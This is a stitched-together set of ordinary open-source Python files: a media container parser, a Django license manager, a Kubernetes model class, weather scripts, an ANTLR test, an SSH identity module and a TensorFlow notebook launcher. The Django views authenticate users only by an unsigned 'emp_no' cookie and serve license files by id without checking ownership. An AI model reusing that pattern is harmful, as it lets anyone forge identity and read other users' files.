        "\xa9ART": (AtomList, "artist", "Metadata: Artist name"),
        "\xa9too": (AtomList, "encoder", "Metadata: Encoder"),
        "\xa9wrt": (AtomList, "writer", "Metadata: Writer"),
        "covr": (AtomList, "cover", "Metadata: Cover art"),
        "----": (AtomList, "misc", "Metadata: Miscellaneous"),
        "tags": (AtomList, "tags", "File tags"),
        "tseg": (AtomList, "tseg", "tseg"),
        "chpl": (NeroChapters, "chpl", "Nero chapter data"),
    }
    # Derived lists of registered handlers and field names.
    # BUGFIX: iterating the dict itself yields the tag *strings*, so the
    # old code collected the first/second character of each tag instead of
    # the (handler, name) tuple members; iterate the values instead.
    tag_handler = [ item[0] for item in tag_info.values() ]
    tag_desc = [ item[1] for item in tag_info.values() ]
    def createFields(self):
        yield UInt32(self, "size")
        yield RawBytes(self, "tag", 4)
        size = self["size"].value
        if size == 1:
            # 64-bit size follows the tag; payload = size64 minus the
            # 16 header bytes already consumed.
            yield UInt64(self, "size64")
            size = self["size64"].value - 16
        elif size == 0:
            # Unbounded atom: extends to the end of the parent (or self).
            # Floor division keeps the byte count an int on Python 2 and 3.
            if self._size is None:
                size = (self.parent.size - self.parent.current_size) // 8 - 8
            else:
                size = (self.size - self.current_size) // 8
        else:
            size = size - 8
        if self['tag'].value == 'uuid':
            # User-extension atom: a GUID follows and acts as the real tag.
            yield GUID(self, "usertag")
            tag = self["usertag"].value
            size -= 16
        else:
            tag = self["tag"].value
        if size > 0:
            if tag in self.tag_info:
                handler, name, desc = self.tag_info[tag]
                yield handler(self, name, desc, size=size*8)
            else:
                # Unknown tag: keep the payload as opaque bytes.
                yield RawBytes(self, "data", size)
    def createDescription(self):
        if self["tag"].value == "uuid":
            return "Atom: uuid: "+self["usertag"].value
        return "Atom: %s" % self["tag"].value
class MovFile(Parser):
    """Parser for Apple QuickTime / ISO MP4 container files: a flat
    sequence of top-level atoms."""
    PARSER_TAGS = {
        "id": "mov",
        "category": "video",
        "file_ext": ("mov", "qt", "mp4", "m4v", "m4a", "m4p", "m4b"),
        "mime": (u"video/quicktime", u'video/mp4'),
        "min_size": 8*8,
        "magic": (("moov", 4*8),),
        "description": "Apple QuickTime movie"
    }
    BRANDS = {
        # File type brand => MIME type
        'mp41': u'video/mp4',
        'mp42': u'video/mp4',
        'avc1': u'video/mp4',
        'isom': u'video/mp4',
        'iso2': u'video/mp4',
    }
    endian = BIG_ENDIAN
    def __init__(self, *args, **kw):
        Parser.__init__(self, *args, **kw)
    # True when the detected MIME type is MP4 rather than QuickTime.
    is_mpeg4 = property(lambda self:self.mime_type==u'video/mp4')
    def validate(self):
        """Accept the stream when the first atom has a sane size and a
        known top-level tag."""
        # TODO: Write better code, erk!
        size = self.stream.readBits(0, 32, self.endian)
        if size < 8:
            return "Invalid first atom size"
        tag = self.stream.readBytes(4*8, 4)
        return tag in ("ftyp", "moov", "free")
    def createFields(self):
        while not self.eof:
            yield Atom(self, "atom[]")
    def createMimeType(self):
        """Derive the MIME type from the 'ftyp' brands, defaulting to
        video/quicktime when no known MP4 brand is present."""
        first = self[0]
        try:
            # Read brands in the file type
            if first['tag'].value != "ftyp":
                return None
            file_type = first["file_type"]
            brand = file_type["brand"].value
            if brand in self.BRANDS:
                return self.BRANDS[brand]
            # Fall back to the compatible-brand list.
            for field in file_type.array("compat_brand"):
                brand = field.value
                if brand in self.BRANDS:
                    return self.BRANDS[brand]
        except MissingField:
            pass
        return u'video/quicktime'
| gpl-2.0 |
idjung96/mng_files | mng_lic/views.py | 1 | 6818 | # -*- coding: utf-8 -*-
from django.shortcuts import render, redirect, render_to_response
from mng_lic import models as lic_models
from largefile import models as l_models
from django.http import HttpResponseBadRequest
from django.http import StreamingHttpResponse
from django.http import HttpResponseRedirect
import math
import time
import os
from mng_files import settings
import datetime
import mimetypes
import urllib.parse
# Create your views here.
def reg_license(request):
    """Handle the license registration form (GET renders it, POST stores it).

    Requires a logged-in user identified by the ``emp_no`` cookie.  On a
    valid POST the uploaded license file is written to disk and a License
    row is created pointing at it.
    """
    if 'emp_no' not in request.COOKIES:
        return redirect('login')
    # Time-based prefix used to make the stored file name unique.
    seeds = str(math.ceil(time.time() * 100))
    if request.method == 'POST':
        form = lic_models.LicenseForm(request.POST, request.FILES)
        if form.is_valid():
            reg_emp_no = str(request.COOKIES['emp_no'])
            program_name = form.cleaned_data['program_name']
            program_ver = form.cleaned_data['program_ver']
            license_type = form.cleaned_data['license_type']
            copy = form.cleaned_data['copy']
            # NOTE(review): 'user' is read from the form but never stored.
            user = form.cleaned_data['user']
            # assumes expire_date is 'YYYY-MM-DD' -- TODO confirm the form
            # field guarantees that format before this split.
            org_expire_date = (form.cleaned_data['expire_date']).split('-')
            expire_date = datetime.date(int(org_expire_date[0]), int(org_expire_date[1]), int(org_expire_date[2]))
            owner_emp_no = form.cleaned_data['owner']
            maintenance = form.cleaned_data['maintenance']
            eula = form.cleaned_data['eula']
            # Persist the uploaded file first, then record its location.
            r_size, file_loc = save_upload_file(request.FILES['license_file'], owner_emp_no, seeds)
            new_lic = lic_models.License.objects.create(owner_employee_number=owner_emp_no,
                                                        program_name=program_name,
                                                        program_ver=program_ver,
                                                        license_type=license_type,
                                                        copy=copy,
                                                        license_file=file_loc,
                                                        expire_date=expire_date,
                                                        maintenance=maintenance,
                                                        reg_employee_number=reg_emp_no,
                                                        eula=eula)
            new_lic.save()
            return render(request, 'msg.html', {'page_header': 'License registered',
                                                'msg_header': '-',
                                                'msg_body': '-'})
    else:
        form = lic_models.LicenseForm()
    return render(request, 'mng_lic/register.html', {'form': form})
def save_upload_file(f, emp_no, seeds):
    """Stream an uploaded file into settings.LICENSE_DIR.

    The stored name is "<seeds>_<emp_no>_<basename>" so concurrent uploads
    cannot collide.  Returns (bytes_written, destination_path); on an I/O
    error the exception is printed and the count reflects what was written
    before the failure.
    """
    # BUGFIX: the counter previously started at -1, under-reporting the
    # stored size by one byte.
    r_size = 0
    # basename() strips any path components a client could embed in the
    # upload name (path-traversal defense); only the final name is kept.
    dfname = seeds + '_' + emp_no + '_' + os.path.basename(f.name)
    file_loc = os.path.join(settings.LICENSE_DIR, dfname)
    try:
        with open(file_loc, 'wb+') as destination:
            for chunk in f.chunks():
                r_size += len(chunk)
                destination.write(chunk)
    except Exception as e:
        # Best-effort: report the failure but still return the partial count.
        print(e)
    return r_size, file_loc
def my_license(request):
    """List the licenses owned by the logged-in employee, latest expiry first."""
    if 'emp_no' not in request.COOKIES:
        return redirect('login')
    context = {}
    if request.method == 'GET':
        emp_no = str(request.COOKIES['emp_no'])
        rows = (lic_models.License.objects
                .filter(owner_employee_number=emp_no)
                .order_by('-expire_date')
                .values())
        context['result'] = list(rows)
    return render(request, 'mng_lic/my_lic.html', context)
def view_eula(request, id_value):
    """Render the EULA of the license identified by ``id_value``."""
    if 'emp_no' not in request.COOKIES:
        return redirect('login')
    if request.method == 'GET':
        # NOTE(review): emp_no is read but not used in the query below.
        emp_no = str(request.COOKIES['emp_no'])
        objects = lic_models.License.objects.filter(id_val=id_value)
        org_result = [entry for entry in objects]
        # NOTE(review): org_result[0] raises IndexError (HTTP 500) when no
        # license matches id_value -- a 404 would be friendlier.
        return render(request, 'mng_lic/view_eula.html', {'result': org_result[0]})
def download_lic(request, id_value):
    """Stream the stored license file ``id_value`` back as an attachment.

    Builds a descriptive download name from the license metadata and
    negotiates the Content-Disposition filename encoding per user agent
    (RFC 2231/5987 for modern browsers, plain UTF-8 for old WebKit,
    nothing for old IE).
    """
    if 'emp_no' not in request.COOKIES:
        return redirect('login')
    if request.method == 'GET':
        obj = lic_models.License.objects.get(pk=id_value)
        file = obj.__dict__
        response = StreamingHttpResponse(open(file['license_file'], 'rb'))
        response['Content-Description'] = 'File Transfer'
        response['Content-Transfer-Encoding'] = 'binary'
        response['Expires'] = '0'
        response['Cache-Control'] = 'must-revalidate'
        response['Pragma'] = 'public'
        h_type, encoding = mimetypes.guess_type(file['license_file'])
        if h_type is None:
            h_type = 'application/octet-stream'
        response['Content-Type'] = h_type
        # BUGFIX: the old split('.')[1] picked the wrong part for stored
        # names containing extra dots (e.g. "my.license.txt") and raised
        # IndexError when there was no dot; splitext is robust to both.
        # The returned extension includes its leading '.' (or is '').
        file_extension = os.path.splitext(file['license_file'])[1]
        filename = file['owner_employee_number'] + '_' + file['program_name'] + '_' + nvl(file['program_ver'], 'nov') + '_' + nvl(file['company'], 'noc') + file_extension
        response['Content-Length'] = str(os.stat(file['license_file']).st_size)
        if encoding is not None:
            response['Content-Encoding'] = encoding
        else:
            response['Content-Encoding'] = 'utf-8'
        filename_header = ''
        if response['Content-Encoding'] == 'utf-8':
            filename_header += "filename*=UTF-8\'\'%s" % urllib.parse.quote(filename)
        elif u'WebKit' in request.META['HTTP_USER_AGENT']:
            # Safari 3.0 and Chrome 2.0 accept a UTF-8 encoded string directly.
            filename_header = 'filename=%s' % filename
        elif u'MSIE' in request.META['HTTP_USER_AGENT']:
            # Old IE does not support internationalized filenames at all.
            filename_header = ''
        else:
            # Firefox and friends follow RFC 2231 (encoding in HTTP headers).
            filename_header = 'filename*=UTF-8\'\'%s' % urllib.parse.quote(filename)
        response['Content-Disposition'] = 'attachment; ' + filename_header
        return response
    return render(request, 'msg.html', {'page_header': 'You file status is abnormal',
                                        'msg_header': 'You should make a request again',
                                        'msg_body': 'You should make a request again'})
def nvl(t, ret_value):
    """Oracle-style NVL: return ``ret_value`` when ``t`` is None, else ``t``.

    Only None triggers the substitution -- falsy values such as '' or 0
    are returned unchanged.
    """
    return ret_value if t is None else t
| gpl-3.0 |
djkonro/client-python | kubernetes/client/models/v1beta1_network_policy_spec.py | 2 | 5714 | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.7.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1beta1NetworkPolicySpec(object):
    """
    NOTE: This class is auto generated by the swagger code generator program.
    Do not edit the class manually.
    """
    def __init__(self, ingress=None, pod_selector=None):
        """
        V1beta1NetworkPolicySpec - a model defined in Swagger
        :param dict swaggerTypes: The key is attribute name
        and the value is attribute type.
        :param dict attributeMap: The key is attribute name
        and the value is json key in definition.
        """
        # Attribute name -> declared Swagger type (used by the (de)serializer).
        self.swagger_types = {
            'ingress': 'list[V1beta1NetworkPolicyIngressRule]',
            'pod_selector': 'V1LabelSelector'
        }
        # Python attribute name -> JSON key in the API definition.
        self.attribute_map = {
            'ingress': 'ingress',
            'pod_selector': 'podSelector'
        }
        # NOTE(review): direct assignment bypasses the property setters, so
        # the pod_selector None-check below is not enforced at construction.
        self._ingress = ingress
        self._pod_selector = pod_selector
    @property
    def ingress(self):
        """
        Gets the ingress of this V1beta1NetworkPolicySpec.
        List of ingress rules to be applied to the selected pods. Traffic is allowed to a pod if there are no NetworkPolicies selecting the pod OR if the traffic source is the pod's local node, OR if the traffic matches at least one ingress rule across all of the NetworkPolicy objects whose podSelector matches the pod. If this field is empty then this NetworkPolicy does not allow any traffic (and serves solely to ensure that the pods it selects are isolated by default).
        :return: The ingress of this V1beta1NetworkPolicySpec.
        :rtype: list[V1beta1NetworkPolicyIngressRule]
        """
        return self._ingress
    @ingress.setter
    def ingress(self, ingress):
        """
        Sets the ingress of this V1beta1NetworkPolicySpec.
        List of ingress rules to be applied to the selected pods. Traffic is allowed to a pod if there are no NetworkPolicies selecting the pod OR if the traffic source is the pod's local node, OR if the traffic matches at least one ingress rule across all of the NetworkPolicy objects whose podSelector matches the pod. If this field is empty then this NetworkPolicy does not allow any traffic (and serves solely to ensure that the pods it selects are isolated by default).
        :param ingress: The ingress of this V1beta1NetworkPolicySpec.
        :type: list[V1beta1NetworkPolicyIngressRule]
        """
        self._ingress = ingress
    @property
    def pod_selector(self):
        """
        Gets the pod_selector of this V1beta1NetworkPolicySpec.
        Selects the pods to which this NetworkPolicy object applies. The array of ingress rules is applied to any pods selected by this field. Multiple network policies can select the same set of pods. In this case, the ingress rules for each are combined additively. This field is NOT optional and follows standard label selector semantics. An empty podSelector matches all pods in this namespace.
        :return: The pod_selector of this V1beta1NetworkPolicySpec.
        :rtype: V1LabelSelector
        """
        return self._pod_selector
    @pod_selector.setter
    def pod_selector(self, pod_selector):
        """
        Sets the pod_selector of this V1beta1NetworkPolicySpec.
        Selects the pods to which this NetworkPolicy object applies. The array of ingress rules is applied to any pods selected by this field. Multiple network policies can select the same set of pods. In this case, the ingress rules for each are combined additively. This field is NOT optional and follows standard label selector semantics. An empty podSelector matches all pods in this namespace.
        :param pod_selector: The pod_selector of this V1beta1NetworkPolicySpec.
        :type: V1LabelSelector
        """
        # pod_selector is a required field in the API definition.
        if pod_selector is None:
            raise ValueError("Invalid value for `pod_selector`, must not be `None`")
        self._pod_selector = pod_selector
    def to_dict(self):
        """
        Returns the model properties as a dict
        """
        result = {}
        # Recursively serialize nested models, lists and dicts of models.
        for attr, _ in iteritems(self.swagger_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value
        return result
    def to_str(self):
        """
        Returns the string representation of the model
        """
        return pformat(self.to_dict())
    def __repr__(self):
        """
        For `print` and `pprint`
        """
        return self.to_str()
    def __eq__(self, other):
        """
        Returns true if both objects are equal
        """
        if not isinstance(other, V1beta1NetworkPolicySpec):
            return False
        return self.__dict__ == other.__dict__
    def __ne__(self, other):
        """
        Returns true if both objects are not equal
        """
        return not self == other
cragwen/hello-world | py/snippet-master/weather/weather_py3.py | 1 | 3282 | # -*- coding: utf-8 -*-
# windows 下如果出现编码问题,将 utf-8 改为 gbk
import urllib.request
import urllib.parse
import gzip
import json
from city import city
def get_weather_1(cityname):
    """Interface 1: query weather.com.cn's cityinfo API by city name.

    Looks up the numeric city code in the local ``city`` table, fetches the
    JSON payload and prints weather, low and high temperature.
    """
    print('\n接口 1:')
    citycode = city.get(cityname)
    if not citycode:
        print('未找到该城市')
        return
    url = 'http://www.weather.com.cn/data/cityinfo/%s.html' % citycode
    print(url)
    resp = urllib.request.urlopen(url).read()
    # Decode the JSON response body into a dict.
    result = json.loads(resp)
    result_data = result.get('weatherinfo')
    if result_data:
        print('天气:', result_data.get('weather'))
        print('最低温度:', result_data.get('temp1'))
        print('最高温度:', result_data.get('temp2'))
    else:
        print('未能获取此城市的天气情况。')
def get_weather_2(cityname):
    """Query the etouch endpoint by city code and print current
    temperature, air quality and the multi-day forecast."""
    print('\n接口 2:')
    citycode = city.get(cityname)
    if not citycode:
        print('未找到该城市')
        return
    url = 'http://wthrcdn.etouch.cn/weather_mini?citykey=%s' % citycode
    print(url)
    resp = urllib.request.urlopen(url).read()
    # The body is gzip-compressed; fall back to the raw bytes when it is
    # not actually compressed (or is truncated).
    try:
        data = gzip.decompress(resp)
    except (OSError, EOFError):
        # Bug fix: was a bare ``except`` which also swallowed
        # SystemExit/KeyboardInterrupt.
        data = resp
    # Decode the JSON payload into a dict.
    result = json.loads(data)
    result_data = result.get('data')
    if result_data:
        print('当前温度:', result_data.get('wendu'), '℃')
        print('空气质量:', result_data.get('aqi'))
        print(result_data.get('ganmao'))
        print('天气预报:')
        forecast = result_data.get('forecast')
        for fc in forecast:
            print(fc.get('date'), ':', fc.get('type'), ',', fc.get('low'), ',', fc.get('high'))
    else:
        print('未能获取此城市的天气情况。')
def get_weather_3(cityname):
    """Query the etouch endpoint by (URL-quoted) city name and print
    current temperature, air quality and the multi-day forecast."""
    print('\n接口 3:')
    # This endpoint takes the city name itself, so it must be URL-quoted.
    cityurl = urllib.parse.quote(cityname)
    url = 'http://wthrcdn.etouch.cn/weather_mini?city=%s' % cityurl
    print(url)
    resp = urllib.request.urlopen(url).read()
    # The body is gzip-compressed; fall back to the raw bytes when it is
    # not actually compressed (or is truncated).
    try:
        data = gzip.decompress(resp)
    except (OSError, EOFError):
        # Bug fix: was a bare ``except`` which also swallowed
        # SystemExit/KeyboardInterrupt.
        data = resp
    # Decode the JSON payload into a dict.
    result = json.loads(data)
    result_data = result.get('data')
    if result_data:
        print('当前温度:', result_data.get('wendu'), '℃')
        print('空气质量:', result_data.get('aqi'))
        print(result_data.get('ganmao'))
        print('天气预报:')
        forecast = result_data.get('forecast')
        for fc in forecast:
            print(fc.get('date'), ':', fc.get('type'), ',', fc.get('low'), ',', fc.get('high'))
    else:
        print('未能获取此城市的天气情况。')
def _main():
    """Interactive driver: prompt for city names until a blank line is
    entered, querying all three endpoints for each city."""
    while True:
        cityname = input('请输入要查询的城市(直接回车退出):\n')
        if not cityname:
            break
        get_weather_1(cityname)
        get_weather_2(cityname)
        get_weather_3(cityname)


if __name__ == '__main__':
    # Bug fix: the loop previously ran unconditionally at module import
    # time; guard it so the module can be imported without side effects.
    _main()
| unlicense |
techstormteam/12-vision-connect-ios-linphone | submodules/externals/antlr3/runtime/Python/unittests/testdfa.py | 16 | 1537 |
import unittest
import antlr3
class TestDFA(unittest.TestCase):
    """Test case for the DFA class."""

    def setUp(self):
        """Set up the test fixture.

        We need a Recognizer in order to instantiate a DFA.
        """
        class TRecognizer(antlr3.BaseRecognizer):
            api_version = 'HEAD'

        self.recog = TRecognizer()

    def testInit(self):
        """DFA.__init__()

        Just a smoke test.
        """
        dfa = antlr3.DFA(
            self.recog, 1,
            eot=[],
            eof=[],
            min=[],
            max=[],
            accept=[],
            special=[],
            transition=[]
            )

    def testUnpack(self):
        """DFA.unpack()"""
        # assertEqual replaces the deprecated failUnlessEqual alias
        # (deprecated since Python 2.7, removed in Python 3.12).
        self.assertEqual(
            antlr3.DFA.unpack(
                u"\1\3\1\4\2\uffff\1\5\22\uffff\1\2\31\uffff\1\6\6\uffff"
                u"\32\6\4\uffff\1\6\1\uffff\32\6"
                ),
            [ 3, 4, -1, -1, 5, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
              -1, -1, -1, -1, -1, -1, 2, -1, -1, -1, -1, -1, -1, -1, -1, -1,
              -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1,
              6, -1, -1, -1, -1, -1, -1, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6,
              6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, -1, -1, -1, -1, 6, -1,
              6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6,
              6, 6, 6, 6, 6
              ]
            )
if __name__ == "__main__":
    # Run the suite with a verbose text runner when executed directly.
    unittest.main(testRunner=unittest.TextTestRunner(verbosity=2))
| gpl-2.0 |
tehmaze-labs/lollipop | lollipop/identity.py | 1 | 5101 | import codecs
import hashlib
import logging
import os
from . import security
from .key import Key, DSA, ECDSA, RSA, load_der
from .buffer import Buffer
logger = logging.getLogger(__name__)
class Identity:
    """A loaded private-key identity: key material plus agent metadata
    (comment, optional provider and expiry)."""

    # Concrete subclasses bind this to their key class (DSA/ECDSA/RSA).
    type = None
    # PEM armor pieces used to sniff the key algorithm out of a key file.
    marker = (
        b'-----BEGIN ',
        b' PRIVATE KEY-----',
    )

    def __init__(self, key, comment=None, provider=None, death=None):
        self.key = key
        self.comment = comment
        self.provider = provider
        self.death = death
        logger.info('loaded identity {!r}'.format(self))

    def __repr__(self):
        return '<{} fingerprint={} comment={}>'.format(
            self.__class__.__name__,
            self.key.fingerprint,
            self.comment,
        )

    @classmethod
    def from_blob(cls, blob):
        """Parse an identity (key plus optional trailing comment) from a
        wire-format blob."""
        data = dict(
            key=Key.from_blob(blob),
        )
        # Leftover debug print()s replaced with logger.debug so normal
        # operation stays quiet.
        logger.debug('remaining blob: %r', blob)
        try:
            data['comment'] = str(blob.pop_str(), 'ascii')
        except IndexError:
            # No comment field present in the blob.
            pass
        logger.debug('parsed key data: %r', data)
        return cls.from_key(**data)

    @classmethod
    def from_key(cls, key, **kwargs):
        """Wrap an already-parsed key object in the matching Identity
        subclass; returns None for unsupported key types."""
        if isinstance(key, DSA):
            return DSAIdentity(key, **kwargs)
        elif isinstance(key, ECDSA):
            return ECDSAIdentity(key, **kwargs)
        elif isinstance(key, RSA):
            return RSAIdentity(key, **kwargs)
        else:
            return None

    @classmethod
    def from_keyfile(cls, filename, password=None):
        """Load an identity from a PEM key file.

        Called on Identity itself, the key type is sniffed from the PEM
        header and dispatched to the matching subclass; called on a
        subclass, the file is parsed directly as that key type.
        """
        filename = os.path.abspath(filename)
        if cls is Identity:
            with open(filename, 'rb') as file:
                kind = None
                for line in file:
                    line = line.strip()
                    if line.startswith(cls.marker[0]) and \
                            line.endswith(cls.marker[1]):
                        kind = line[len(cls.marker[0]):-len(cls.marker[1])]
                        kind = str(kind, 'ascii').strip()
                        break

                if kind is None:
                    raise TypeError("Can't determine key type for {}".format(
                        filename,
                    ))

                file.seek(0)
                for subclass in Identity.__subclasses__():
                    if subclass.type.__name__ == kind:
                        return subclass.from_str(
                            file.read(),
                            password=password,
                            comment=filename,
                        )

                raise TypeError('Unsupported key type "{}"'.format(kind))

        else:
            logger.info('loading {} identity from keyfile {}'.format(
                # Bug fix: was self.__class__.__name__ -- there is no
                # ``self`` in a classmethod, so this path raised NameError.
                cls.__name__,
                filename,
            ))
            with open(filename, 'rb') as file:
                # Bug fix: ``password`` and ``comment`` were previously
                # dropped on this path, silently ignoring the passphrase.
                return cls.from_str(file.read(), password=password,
                                    comment=filename)

    @classmethod
    def from_str(cls, data, password=None, comment=None):
        """Parse PEM *data* with this identity's key class."""
        return cls(
            key=cls.type.from_pem(data, password=password),
            comment=comment,
        )
class DSAIdentity(Identity):
    """Identity backed by a DSA private key."""
    type = DSA
class ECDSAIdentity(Identity):
    """Identity backed by an ECDSA private key."""
    type = ECDSA
class RSAIdentity(Identity):
    """Identity backed by an RSA private key."""
    type = RSA

    def sign(self, data):
        """Sign *data* and return an SSH wire-format signature buffer:
        the algorithm name string followed by the SHA-1 RSA signature."""
        output = Buffer()
        output.put_str('ssh-rsa')
        output.extend(self.key.sign(data, hashlib.sha1))
        return output
class Identities:
    """Ordered, mutable collection of Identity objects, searchable by key."""

    def __init__(self):
        self.identities = []

    def __contains__(self, item):
        # Accept either a raw Key (matched against each identity's key)
        # or an Identity instance (matched directly).
        if isinstance(item, Key):
            return any(entry.key == item for entry in self.identities)
        elif isinstance(item, Identity):
            return item in self.identities
        else:
            raise ValueError(item)

    def __getitem__(self, key):
        # Implicitly returns None when no identity matches the key.
        for entry in self.identities:
            if entry.key == key:
                return entry

    def __iter__(self):
        # The collection acts as its own (non-reentrant) iterator.
        self.__cursor__ = -1
        return self

    def __next__(self):
        self.__cursor__ += 1
        if self.__cursor__ < len(self.identities):
            return self.identities[self.__cursor__]
        raise StopIteration()

    def __len__(self):
        return len(self.identities)

    def add(self, identity):
        """Append an identity to the collection."""
        self.identities.append(identity)

    def add_dsa_keyfile(self, filename, password=None):
        self.add(DSAIdentity.from_keyfile(filename, password=password))

    def add_ecdsa_keyfile(self, filename, password=None):
        self.add(ECDSAIdentity.from_keyfile(filename, password=password))

    def add_rsa_keyfile(self, filename, password=None):
        self.add(RSAIdentity.from_keyfile(filename, password=password))

    def remove(self, identity):
        """Drop *identity* from the collection and scrub its key material."""
        logger.info('removing identity {}'.format(identity))
        if identity in self.identities:
            self.identities.remove(identity)
            # Drop references to the key before asking the security layer
            # to collect/scrub the freed memory.
            del identity.key
            del identity
            security.gc()

    def remove_key(self, key):
        """Remove every identity whose key equals *key*."""
        for entry in self.identities:
            if entry.key == key:
                self.remove(entry)
| mit |
adit-chandra/tensorflow | tensorflow/python/client/notebook.py | 61 | 4779 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Notebook front-end to TensorFlow.
When you run this binary, you'll see something like below, which indicates
the serving URL of the notebook:
The IPython Notebook is running at: http://127.0.0.1:8888/
Press "Shift+Enter" to execute a cell
Press "Enter" on a cell to go into edit mode.
Press "Escape" to go back into command mode and use arrow keys to navigate.
Press "a" in command mode to insert cell above or "b" to insert cell below.
Your root notebooks directory is FLAGS.notebook_dir
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import socket
import sys
from tensorflow.python.platform import app
# pylint: disable=g-import-not-at-top
# Official recommended way of turning on fast protocol buffers as of 10/21/14
os.environ["PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION"] = "cpp"
os.environ["PROTOCOL_BUFFERS_PYTHON_IMPLEMENTATION_VERSION"] = "2"
FLAGS = None
ORIG_ARGV = sys.argv
# Main notebook process calls itself with argv[1]="kernel" to start kernel
# subprocesses.
IS_KERNEL = len(sys.argv) > 1 and sys.argv[1] == "kernel"
def main(unused_argv):
  """Run either the notebook server (default) or a kernel subprocess.

  The same binary serves both roles: the parent process starts the
  NotebookApp, and re-invocations with argv[1] == "kernel" (see IS_KERNEL)
  start IPython kernel subprocesses.
  """
  # Reset argv to the value captured at import time.
  sys.argv = ORIG_ARGV

  if not IS_KERNEL:
    # Drop all flags.
    sys.argv = [sys.argv[0]]
    # NOTE(sadovsky): For some reason, putting this import at the top level
    # breaks inline plotting.  It's probably a bug in the stone-age version of
    # matplotlib.
    from IPython.html.notebookapp import NotebookApp  # pylint: disable=g-import-not-at-top
    notebookapp = NotebookApp.instance()
    notebookapp.open_browser = True

    # password functionality adopted from quality/ranklab/main/tools/notebook.py
    # add options to run with "password"
    if FLAGS.password:
      from IPython.lib import passwd  # pylint: disable=g-import-not-at-top
      # With a password set, bind to all interfaces (public access).
      notebookapp.ip = "0.0.0.0"
      notebookapp.password = passwd(FLAGS.password)
    else:
      print("\nNo password specified; Notebook server will only be available"
            " on the local machine.\n")
    notebookapp.initialize(argv=["--notebook-dir", FLAGS.notebook_dir])

    if notebookapp.ip == "0.0.0.0":
      proto = "https" if notebookapp.certfile else "http"
      url = "%s://%s:%d%s" % (proto, socket.gethostname(), notebookapp.port,
                              notebookapp.base_project_url)
      print("\nNotebook server will be publicly available at: %s\n" % url)

    notebookapp.start()
    return

  # Drop the --flagfile flag so that notebook doesn't complain about an
  # "unrecognized alias" when parsing sys.argv.
  sys.argv = ([sys.argv[0]] +
              [z for z in sys.argv[1:] if not z.startswith("--flagfile")])
  from IPython.kernel.zmq.kernelapp import IPKernelApp  # pylint: disable=g-import-not-at-top
  kernelapp = IPKernelApp.instance()
  kernelapp.initialize()

  # Enable inline plotting. Equivalent to running "%matplotlib inline".
  ipshell = kernelapp.shell
  ipshell.enable_matplotlib("inline")

  kernelapp.start()
if __name__ == "__main__":
  parser = argparse.ArgumentParser()
  parser.add_argument(
      "--password",
      type=str,
      default=None,
      help="""\
      Password to require. If set, the server will allow public access. Only
      used if notebook config file does not exist.\
      """)
  parser.add_argument(
      "--notebook_dir",
      type=str,
      default="experimental/brain/notebooks",
      help="root location where to store notebooks")

  # When the user starts the main notebook process, we don't touch sys.argv.
  # When the main process launches kernel subprocesses, it writes all flags
  # to a tmpfile and sets --flagfile to that tmpfile, so for kernel
  # subprocesses here we drop all flags *except* --flagfile, then call
  # app.run(), and then (in main) restore all flags before starting the
  # kernel app.
  if IS_KERNEL:
    # Drop everything except --flagfile.
    sys.argv = (
        [sys.argv[0]] + [x for x in sys.argv[1:] if x.startswith("--flagfile")])
  # Parse known flags into the module-global FLAGS; anything unrecognized
  # is forwarded to app.run() untouched.
  FLAGS, unparsed = parser.parse_known_args()
  app.run(main=main, argv=[sys.argv[0]] + unparsed)
| apache-2.0 |
openstack/python-swiftclient | swiftclient/command_helpers.py | 1 | 7094 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from swiftclient.utils import prt_bytes, split_request_headers
POLICY_HEADER_PREFIX = 'x-account-storage-policy-'
def stat_account(conn, options):
    """HEAD the account and build (label, value) stat pairs.

    Returns a tuple of (items, headers): the formatted pairs plus the raw
    response headers. Per-storage-policy counters are reported for every
    policy mentioned in the account headers.
    """
    req_headers = split_request_headers(options.get('header', []))
    headers = conn.head_account(headers=req_headers)

    items = []
    if options['verbose'] > 1:
        items.append(('StorageURL', conn.url))
        items.append(('Auth Token', conn.token))

    container_count = int(headers.get('x-account-container-count', 0))
    object_count = prt_bytes(headers.get('x-account-object-count', 0),
                             options['human']).lstrip()
    bytes_used = prt_bytes(headers.get('x-account-bytes-used', 0),
                           options['human']).lstrip()
    items += [
        ('Account', conn.url.rsplit('/', 1)[-1]),
        ('Containers', container_count),
        ('Objects', object_count),
        ('Bytes', bytes_used),
    ]

    # Collect the distinct policy names embedded in the header names.
    policies = set()
    for name in headers:
        if name.lower().startswith(POLICY_HEADER_PREFIX):
            policies.add(name.rsplit('-', 2)[0].split('-', 4)[-1])

    for policy in policies:
